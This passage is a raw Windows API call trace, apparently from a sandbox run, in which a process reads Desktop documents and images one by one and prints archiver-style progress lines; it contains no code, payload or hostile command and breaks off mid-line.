nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0xf312, lpOverlapped=0x0) returned 1 [0062.835] SetEvent (hEvent=0xd4) returned 1 [0062.835] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.836] GetTickCount () returned 0x11472a1 [0062.836] strcmp (_Str1="+", _Str2="+") returned 0 [0062.836] strlen (_Str="25") returned 0x2 [0062.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KGvZ520tJ.ods", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KGvZ520tJ.ods", cchWideChar=13, lpMultiByteStr=0x1c82010, cbMultiByte=13, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="KGvZ520tJ.ods \r", lpUsedDefaultChar=0x22e868) returned 13 [0062.836] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.837] fputs (in: _Str=" 25% 11 + KGvZ520tJ.ods", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.838] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.838] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.838] free (_Block=0x1c866c8) [0062.838] free (_Block=0x1c87a20) [0062.838] CloseHandle (hObject=0xe8) returned 1 [0062.838] free (_Block=0x1c86668) [0062.838] SetEvent (hEvent=0xd4) returned 1 [0062.838] free (_Block=0x1c87a68) [0062.838] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.840] malloc (_Size=0x70) returned 0x1c86818 [0062.840] wcscmp (_String1="KGvZ520tJ.ods", _String2="KGvZ520tJ.ods") returned 0 [0062.840] strlen (_Str="25") returned 0x2 [0062.840] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KGvZ520tJ.ods", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0062.840] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="KGvZ520tJ.ods", cchWideChar=13, lpMultiByteStr=0x1c82010, cbMultiByte=13, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="KGvZ520tJ.ods \r", lpUsedDefaultChar=0x22e9a8) returned 13 [0062.841] strcmp (_Str1=" 25% 11 + KGvZ520tJ.ods", _Str2=" 25% 12 + KGvZ520tJ.ods") returned -1 [0062.841] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.841] fputs (in: _Str=" 25% 12 + KGvZ520tJ.ods", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.842] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.842] malloc (_Size=0x60) returned 0x1c85bb8 [0062.842] free (_Block=0x0) [0062.842] malloc (_Size=0x1) returned 0x27fb60 [0062.842] free (_Block=0x0) [0062.842] malloc (_Size=0x4) returned 0x27fbe0 [0062.842] free (_Block=0x0) [0062.842] malloc (_Size=0x8) returned 0x27fbf0 [0062.843] malloc (_Size=0x18) returned 0x1c86348 [0062.843] ResetEvent (hEvent=0xd0) returned 1 [0062.843] ResetEvent (hEvent=0xd4) returned 1 [0062.843] ResetEvent (hEvent=0xd8) returned 1 [0062.843] malloc (_Size=0x20) returned 0x1c82ca0 [0062.843] realloc (_Block=0x0, _Size=0xa) returned 0x1c87a68 [0062.843] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mcjVmrm7V7AJ6t.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mcjvmrm7v7aj6t.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.843] free (_Block=0x1c891b0) [0062.843] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x138c7, lpOverlapped=0x0) returned 1 [0062.846] SetEvent (hEvent=0xd4) returned 1 [0062.846] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.846] GetTickCount () returned 0x11472a1 [0062.846] strcmp (_Str1="+", _Str2="+") returned 0 [0062.846] strlen (_Str="28") returned 0x2 [0062.847] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mcjVmrm7V7AJ6t.odt", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0062.847] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mcjVmrm7V7AJ6t.odt", cchWideChar=18, lpMultiByteStr=0x1c82010, cbMultiByte=18, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="mcjVmrm7V7AJ6t.odt \r", lpUsedDefaultChar=0x22e868) returned 18 [0062.847] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.848] fputs (in: _Str=" 28% 12 + mcjVmrm7V7AJ6t.odt", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.849] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.849] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.849] free (_Block=0x1c87f20) [0062.849] free (_Block=0x1c87bd0) [0062.849] CloseHandle (hObject=0xe8) returned 1 [0062.849] free (_Block=0x1c86538) [0062.849] SetEvent (hEvent=0xd4) returned 1 [0062.849] free (_Block=0x1c87b40) [0062.849] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.858] free (_Block=0x1c83d80) [0062.859] free (_Block=0x1c86368) [0062.859] free (_Block=0x1c82ca0) [0062.859] free (_Block=0x0) [0062.859] free (_Block=0x0) [0062.859] free (_Block=0x0) [0062.859] malloc (_Size=0x8) returned 0x1c83d80 [0062.859] malloc (_Size=0x26) returned 0x1c836a0 [0062.859] free (_Block=0x1c83d80) [0062.859] malloc (_Size=0xc) returned 0x1c87a68 [0062.859] malloc (_Size=0x26) returned 0x1c83670 [0062.859] free (_Block=0x1c836a0) [0062.859] free (_Block=0x27fbf0) [0062.859] free (_Block=0x27fbe0) [0062.859] free (_Block=0x27fb60) [0062.859] free (_Block=0x1c85bb8) [0062.859] GetTickCount () returned 0x11472b1 [0062.859] malloc (_Size=0x60) returned 0x1c85bb8 [0062.859] free (_Block=0x0) [0062.859] malloc (_Size=0x1) returned 0x27fb60 [0062.860] free (_Block=0x0) [0062.860] malloc (_Size=0x4) returned 0x27fbe0 [0062.860] free (_Block=0x0) [0062.860] malloc (_Size=0x8) returned 0x27fbf0 [0062.860] malloc (_Size=0x18) returned 0x1c86368 [0062.860] ResetEvent (hEvent=0xd0) returned 1 [0062.860] ResetEvent (hEvent=0xd4) returned 1 [0062.860] ResetEvent (hEvent=0xd8) returned 1 [0062.860] malloc (_Size=0x20) returned 0x1c82ca0 [0062.860] realloc (_Block=0x0, _Size=0xa) returned 0x1c87b40 [0062.860] strlen (_Str="28") returned 0x2 [0062.860] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\C3I6eOjcg.flv", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0062.860] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\C3I6eOjcg.flv", cchWideChar=30, lpMultiByteStr=0x1c82010, cbMultiByte=30, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="mfZck7HwXf4SziBj\\C3I6eOjcg.flv\r", lpUsedDefaultChar=0x22e760) returned 30 [0062.860] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.861] fputs (in: _Str=" 28% 13 + mfZck7HwXf4SziBj\\C3I6eOjcg.flv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.863] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.863] free (_Block=0x1c84d90) [0062.863] malloc (_Size=0x58) returned 0x1c86538 [0062.863] malloc (_Size=0x8) returned 0x1c83db0 [0062.863] malloc (_Size=0x8a) returned 0x1c87f20 [0062.863] free (_Block=0x1c83db0) [0062.863] malloc (_Size=0x8a) returned 0x1c891b0 [0062.863] free (_Block=0x1c87f20) [0062.863] malloc (_Size=0xc) returned 0x1c87c18 [0062.863] malloc (_Size=0x8a) returned 0x1c87f20 [0062.863] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\C3I6eOjcg.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mfzck7hwxf4szibj\\c3i6eojcg.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.864] free (_Block=0x1c891b0) [0062.864] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x76e9, lpOverlapped=0x0) returned 1 [0062.866] SetEvent (hEvent=0xd4) returned 1 [0062.866] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.866] GetTickCount () returned 0x11472c0 [0062.866] strcmp (_Str1="+", _Str2="+") returned 0 [0062.866] wcscmp (_String1="mfZck7HwXf4SziBj\\C3I6eOjcg.flv", _String2="mfZck7HwXf4SziBj\\C3I6eOjcg.flv") returned 0 [0062.866] strlen (_Str="29") returned 0x2 [0062.866] strcmp (_Str1=" 29%", _Str2=" 28%") returned 1 [0062.866] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\C3I6eOjcg.flv", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0062.866] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\C3I6eOjcg.flv", cchWideChar=30, lpMultiByteStr=0x1c82010, cbMultiByte=30, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="mfZck7HwXf4SziBj\\C3I6eOjcg.flv", lpUsedDefaultChar=0x22e868) returned 30 [0062.866] strcmp (_Str1=" 28% 13 + mfZck7HwXf4SziBj\\C3I6eOjcg.flv", _Str2=" 29% 13 + mfZck7HwXf4SziBj\\C3I6eOjcg.flv") returned -1 [0062.867] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.867] fputs (in: _Str=" 29% 13 + mfZck7HwXf4SziBj\\C3I6eOjcg.flv", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.868] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.868] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.868] free (_Block=0x1c87f20) [0062.868] free (_Block=0x1c87c18) [0062.869] CloseHandle (hObject=0xe8) returned 1 [0062.869] free (_Block=0x1c86538) [0062.869] SetEvent (hEvent=0xd4) returned 1 [0062.869] free (_Block=0x1c87c00) [0062.869] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.870] free (_Block=0x1c83da0) [0062.870] free (_Block=0x1c86388) [0062.870] free (_Block=0x1c82ca0) [0062.870] free (_Block=0x0) [0062.870] free (_Block=0x0) [0062.870] free (_Block=0x0) [0062.870] malloc (_Size=0x8) returned 0x1c83da0 [0062.870] malloc (_Size=0x3e) returned 0x1c84d90 [0062.870] free (_Block=0x1c83da0) [0062.870] malloc (_Size=0xc) returned 0x1c87b40 [0062.870] malloc (_Size=0x3e) returned 0x1c84cb8 [0062.871] free (_Block=0x1c84d90) [0062.871] free (_Block=0x27fbf0) [0062.871] free (_Block=0x27fbe0) [0062.871] free (_Block=0x27fb60) [0062.871] free (_Block=0x1c85bb8) [0062.871] GetTickCount () returned 0x11472c0 [0062.871] malloc (_Size=0x60) returned 0x1c85bb8 [0062.871] free (_Block=0x0) [0062.871] malloc (_Size=0x1) returned 0x27fb60 [0062.871] free (_Block=0x0) [0062.871] malloc (_Size=0x4) returned 0x27fbe0 [0062.871] free (_Block=0x0) [0062.871] malloc (_Size=0x8) returned 0x27fbf0 [0062.871] malloc (_Size=0x18) returned 0x1c86388 [0062.871] malloc (_Size=0x48) returned 0x1c86538 [0062.871] realloc (_Block=0x0, _Size=0xa) returned 0x1c87c00 [0062.871] strlen (_Str="29") returned 0x2 [0062.871] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\hq8xL2.png", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0062.871] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\hq8xL2.png", cchWideChar=27, lpMultiByteStr=0x1c82010, cbMultiByte=27, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="mfZck7HwXf4SziBj\\hq8xL2.png \r", lpUsedDefaultChar=0x22e760) returned 27 [0062.871] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.872] fputs (in: _Str=" 29% 14 + mfZck7HwXf4SziBj\\hq8xL2.png", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.873] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.873] free (_Block=0x1c882c0) [0062.873] malloc (_Size=0x58) returned 0x1c87f20 [0062.873] malloc (_Size=0x8) returned 0x1c83dd0 [0062.873] malloc (_Size=0x84) returned 0x1c891b0 [0062.873] free (_Block=0x1c83dd0) [0062.873] malloc (_Size=0x84) returned 0x1c89240 [0062.873] free (_Block=0x1c891b0) [0062.873] malloc (_Size=0xc) returned 0x1c87c48 [0062.873] malloc (_Size=0x84) returned 0x1c891b0 [0062.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\hq8xL2.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mfzck7hwxf4szibj\\hq8xl2.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.873] free (_Block=0x1c89240) [0062.873] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0xd639, lpOverlapped=0x0) returned 1 [0062.875] SetEvent (hEvent=0xd4) returned 1 [0062.875] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.876] GetTickCount () returned 0x11472c0 [0062.876] strcmp (_Str1="+", _Str2="+") returned 0 [0062.876] wcscmp (_String1="mfZck7HwXf4SziBj\\hq8xL2.png", _String2="mfZck7HwXf4SziBj\\hq8xL2.png") returned 0 [0062.876] strlen (_Str="31") returned 0x2 [0062.876] strcmp (_Str1=" 31%", _Str2=" 29%") returned 1 [0062.876] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\hq8xL2.png", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0062.876] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\hq8xL2.png", cchWideChar=27, lpMultiByteStr=0x1c82010, cbMultiByte=27, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="mfZck7HwXf4SziBj\\hq8xL2.png \r", lpUsedDefaultChar=0x22e868) returned 27 [0062.876] strcmp (_Str1=" 29% 14 + mfZck7HwXf4SziBj\\hq8xL2.png", _Str2=" 31% 14 + mfZck7HwXf4SziBj\\hq8xL2.png") returned -1 [0062.876] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.877] fputs (in: _Str=" 31% 14 + mfZck7HwXf4SziBj\\hq8xL2.png", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.878] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.878] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.878] free (_Block=0x1c891b0) [0062.878] free (_Block=0x1c87c48) [0062.878] CloseHandle (hObject=0xe8) returned 1 [0062.879] free (_Block=0x1c87f20) [0062.879] SetEvent (hEvent=0xd4) returned 1 [0062.879] free (_Block=0x1c87c30) [0062.879] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.947] malloc (_Size=0x90) returned 0x1c87f20 [0062.947] wcscmp (_String1="mfZck7HwXf4SziBj\\hq8xL2.png", _String2="mfZck7HwXf4SziBj\\hq8xL2.png") returned 0 [0062.947] strlen (_Str="31") returned 0x2 [0062.947] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\hq8xL2.png", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0062.947] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\hq8xL2.png", cchWideChar=27, lpMultiByteStr=0x1c82010, cbMultiByte=27, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="mfZck7HwXf4SziBj\\hq8xL2.png \r", lpUsedDefaultChar=0x22e9a8) returned 27 [0062.947] strcmp (_Str1=" 31% 14 + mfZck7HwXf4SziBj\\hq8xL2.png", _Str2=" 31% 15 + mfZck7HwXf4SziBj\\hq8xL2.png") returned -1 [0062.947] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.948] fputs (in: _Str=" 31% 15 + mfZck7HwXf4SziBj\\hq8xL2.png", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.949] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.949] malloc (_Size=0x60) returned 0x1c85bb8 [0062.949] free (_Block=0x0) [0062.949] malloc (_Size=0x1) returned 0x27fb60 [0062.949] free (_Block=0x0) [0062.949] malloc (_Size=0x4) returned 0x27fbe0 [0062.949] free (_Block=0x0) [0062.949] malloc (_Size=0x8) returned 0x27fbf0 [0062.949] malloc (_Size=0x18) returned 0x1c86308 [0062.949] ResetEvent (hEvent=0xd0) returned 1 [0062.949] ResetEvent (hEvent=0xd4) returned 1 [0062.949] ResetEvent (hEvent=0xd8) returned 1 [0062.950] malloc (_Size=0x20) returned 0x1c82ca0 [0062.950] realloc (_Block=0x0, _Size=0xa) returned 0x1c87c30 [0062.950] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\q6TXhUAdi.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mfzck7hwxf4szibj\\q6txhuadi.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.950] free (_Block=0x1c890e0) [0062.950] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x160f8, lpOverlapped=0x0) returned 1 [0062.953] SetEvent (hEvent=0xd4) returned 1 [0062.953] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.953] GetTickCount () returned 0x114730e [0062.953] strcmp (_Str1="+", _Str2="+") returned 0 [0062.953] strlen (_Str="34") returned 0x2 [0062.953] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\q6TXhUAdi.bmp", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0062.953] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\q6TXhUAdi.bmp", cchWideChar=30, lpMultiByteStr=0x1c82010, cbMultiByte=30, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="mfZck7HwXf4SziBj\\q6TXhUAdi.bmp \r", lpUsedDefaultChar=0x22e868) returned 30 [0062.953] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.954] fputs (in: _Str=" 34% 15 + mfZck7HwXf4SziBj\\q6TXhUAdi.bmp", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.955] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.955] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.955] free (_Block=0x1c89048) [0062.956] free (_Block=0x1c87c78) [0062.956] CloseHandle (hObject=0xe8) returned 1 [0062.956] free (_Block=0x1c88fe8) [0062.956] SetEvent (hEvent=0xd4) returned 1 [0062.956] free (_Block=0x1c87c60) [0062.956] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.959] free (_Block=0x1c83de0) [0062.959] free (_Block=0x1c863c8) [0062.959] free (_Block=0x1c82ca0) [0062.959] free (_Block=0x0) [0062.959] free (_Block=0x0) [0062.959] free (_Block=0x0) [0062.959] malloc (_Size=0x8) returned 0x1c83de0 [0062.959] malloc (_Size=0x3e) returned 0x1c84dd8 [0062.959] free (_Block=0x1c83de0) [0062.959] malloc (_Size=0xc) returned 0x1c87c30 [0062.959] malloc (_Size=0x3e) returned 0x1c84d90 [0062.959] free (_Block=0x1c84dd8) [0062.960] free (_Block=0x27fbf0) [0062.960] free (_Block=0x27fbe0) [0062.960] free (_Block=0x27fb60) [0062.960] free (_Block=0x1c85bb8) [0062.960] GetTickCount () returned 0x114731e [0062.960] malloc (_Size=0x60) returned 0x1c85bb8 [0062.960] free (_Block=0x0) [0062.960] malloc (_Size=0x1) returned 0x27fb60 [0062.960] free (_Block=0x0) [0062.960] malloc (_Size=0x4) returned 0x27fbe0 [0062.960] free (_Block=0x0) [0062.960] malloc (_Size=0x8) returned 0x27fbf0 [0062.960] malloc (_Size=0x18) returned 0x1c863c8 [0062.960] ResetEvent (hEvent=0xd0) returned 1 [0062.960] ResetEvent (hEvent=0xd4) returned 1 [0062.960] ResetEvent (hEvent=0xd8) returned 1 [0062.960] malloc (_Size=0x20) returned 0x1c82ca0 [0062.961] realloc (_Block=0x0, _Size=0xa) returned 0x1c87c60 [0062.961] strlen (_Str="34") returned 0x2 [0062.961] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0062.961] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", cchWideChar=31, lpMultiByteStr=0x1c82010, cbMultiByte=31, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="mfZck7HwXf4SziBj\\z8HWZufZB7.jpg \r", lpUsedDefaultChar=0x22e760) returned 31 [0062.961] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.962] fputs (in: _Str=" 34% 16 + mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.963] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.963] free (_Block=0x1c84e20) [0062.963] malloc (_Size=0x58) returned 0x1c88fe8 [0062.963] malloc (_Size=0x8) returned 0x1c83e10 [0062.963] malloc (_Size=0x8c) returned 0x1c89048 [0062.963] free (_Block=0x1c83e10) [0062.963] malloc (_Size=0x8c) returned 0x1c890e0 [0062.963] free (_Block=0x1c89048) [0062.963] malloc (_Size=0xc) returned 0x1c87ca8 [0062.963] malloc (_Size=0x8c) returned 0x1c89048 [0062.963] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mfZck7HwXf4SziBj\\z8HWZufZB7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mfzck7hwxf4szibj\\z8hwzufzb7.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.963] free (_Block=0x1c890e0) [0062.963] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x16cb, lpOverlapped=0x0) returned 1 [0062.965] SetEvent (hEvent=0xd4) returned 1 [0062.965] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.966] GetTickCount () returned 0x114731e [0062.966] strcmp (_Str1="+", _Str2="+") returned 0 [0062.966] wcscmp (_String1="mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", _String2="mfZck7HwXf4SziBj\\z8HWZufZB7.jpg") returned 0 [0062.966] strlen (_Str="35") returned 0x2 [0062.966] strcmp (_Str1=" 35%", _Str2=" 34%") returned 1 [0062.966] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0062.966] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="mfZck7HwXf4SziBj\\z8HWZufZB7.jpg", cchWideChar=31, lpMultiByteStr=0x1c82010, cbMultiByte=31, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="mfZck7HwXf4SziBj\\z8HWZufZB7.jpg \r", lpUsedDefaultChar=0x22e868) returned 31 [0062.966] strcmp 